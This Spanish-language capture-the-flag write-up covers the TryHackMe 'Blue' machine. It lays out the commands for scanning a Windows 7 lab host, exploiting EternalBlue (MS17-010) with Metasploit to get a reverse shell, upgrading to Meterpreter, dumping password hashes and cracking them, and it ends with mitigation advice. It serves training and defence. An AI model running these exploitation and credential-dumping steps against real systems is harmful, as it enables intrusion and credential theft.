Share
## https://sploitus.com/exploit?id=FCF7CF2D-E166-5694-B9A9-DB4E6C6F323C
# 🛡️ TryHackMe CTF – EternalBlue (MS17-010)
  
---
## 📄 Índice
- [🛡️ TryHackMe CTF – EternalBlue (MS17-010)](#️-tryhackme-ctf--eternalblue-ms17-010)
- [📄 Índice](#-índice)
- [1️⃣ Información General](#1️⃣-información-general)
- [2️⃣ Objetivos](#2️⃣-objetivos)
- [3️⃣ Reconocimiento](#3️⃣-reconocimiento)
- [Escaneo de Servicios](#escaneo-de-servicios)
- [Referencia Técnica](#referencia-técnica)
- [4️⃣ Explotación](#4️⃣-explotación)
- [Uso de Metasploit](#uso-de-metasploit)
- [5️⃣ Post-Explotación](#5️⃣-post-explotación)
- [Conversión a Meterpreter](#conversión-a-meterpreter)
- [Enumeración y Migración](#enumeración-y-migración)
- [6️⃣ Extracción de Credenciales](#6️⃣-extracción-de-credenciales)
- [Dump de Hashes](#dump-de-hashes)
- [Cracking Offline](#cracking-offline)
- [7️⃣ Flags Obtenidas](#7️⃣-flags-obtenidas)
- [8️⃣ Mitigación](#8️⃣-mitigación)
- [9️⃣ Lecciones Aprendidas](#9️⃣-lecciones-aprendidas)
- [🔟 Referencias](#-referencias)
---
## 1️⃣ Información General

- **Nombre de la máquina:** Blue
- **Plataforma:** TryHackMe
- **IP Objetivo:** `10.67.130.110`
- **Sistema Operativo:** Windows 7 SP1 x64
- **Vulnerabilidad principal:** EternalBlue (MS17-010)
- **Impacto:** Remote Code Execution (RCE)
- **Gravedad:** 🔴 Crítica
---
## 2️⃣ Objetivos
- Obtener acceso inicial al sistema objetivo.
- Escalar privilegios hasta SYSTEM.
- Extraer todas las flags del sistema.
- Documentar la vulnerabilidad y proponer mitigaciones.
---
## 3️⃣ Reconocimiento
### Escaneo de Servicios
```bash
nmap -sV --script vuln 10.67.130.110
```

**Resultados clave:**
- SMBv1 habilitado en puerto 445
- Vulnerabilidad MS17-010 detectada
- Potencial vector de RCE
### Referencia Técnica
- **CVE:** CVE-2017-0144
- **Descripción:** Permite la ejecución remota de código mediante paquetes SMB maliciosos.

---
## 4️⃣ Explotación
### Uso de Metasploit
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.67.130.110
set LPORT 4444
run
```

**Resultado:** shell reversa exitosa.

---
## 5️⃣ Post-Explotación
### Conversión a Meterpreter
```bash
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
```

### Enumeración y Migración
```bash
sysinfo
getuid
ps
migrate
```
- OS: Windows 7 SP1 x64
- Usuario: NT AUTHORITY\SYSTEM

---
## 6️⃣ Extracción de Credenciales
### Dump de Hashes
```bash
hashdump
```

### Cracking Offline
- Herramienta: John the Ripper
- Usuario: Jon

---
## 7️⃣ Flags Obtenidas
| Flag | Ubicación | Evidencia |
|-----------------|------------------------------|----------------------------|
| **User Flag** | `C:\` |  |
| **System Flag** | `C:\Windows\System32\config` |  |
| **Secret Flag** | `C:\Users\Jon\Documents` |  |
---
## 8️⃣ Mitigación
1. **Deshabilitar SMBv1** – migrar a SMBv2/3.
2. **Aplicar parche MS17-010** – instalar la actualización oficial.
3. **Segmentación de red** – limitar acceso a puertos 139 y 445.
4. **Políticas de contraseñas robustas** – evitar ataques de cracking exitosos.
---
## 9️⃣ Lecciones Aprendidas
- Validar protocolos antiguos como SMBv1 es crítico.
- Nmap NSE es útil para identificar vulnerabilidades críticas.
- Flujo completo de explotación: Recon → Exploit → Post-Explotación → Escalada → Flags.
---
## 🔟 Referencias
- [CVE-2017-0144 – MITRE](https://vulners.com/cve/CVE-2017-0144)
- [Metasploit Framework](https://www.metasploit.com/)
- [John the Ripper](https://www.openwall.com/john/)